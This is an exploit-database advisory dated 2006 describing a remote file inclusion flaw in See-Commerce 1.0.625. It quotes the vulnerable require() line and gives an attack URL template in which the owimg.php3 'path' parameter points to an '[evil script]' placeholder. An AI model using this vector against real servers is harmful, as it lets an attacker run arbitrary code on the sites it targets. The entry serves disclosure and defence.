See-Commerce <= 1.0.625 (owimg.php3) Remote Include Vulnerability

2006-08-09T00:00:00
ID 1337DAY-ID-670
Type zdt
Reporter Drago84
Modified 2006-08-09T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =================================================================
See-Commerce <= 1.0.625 (owimg.php3) Remote Include Vulnerability
=================================================================



See-Commerce Remote File Inclusion

CreW: ToXiC

Bug Found by Drago84

Source Code:
http://freshmeat.net/redir/seecommerce/14016/url_zip/sc-1.0.625.zip

Problem Is:
require($path."/ow.inc");

Page Affect:
http://[site]/[see-commerce directory]/owimg.php3?path=[evil script]



#  0day.today [2018-01-26]  #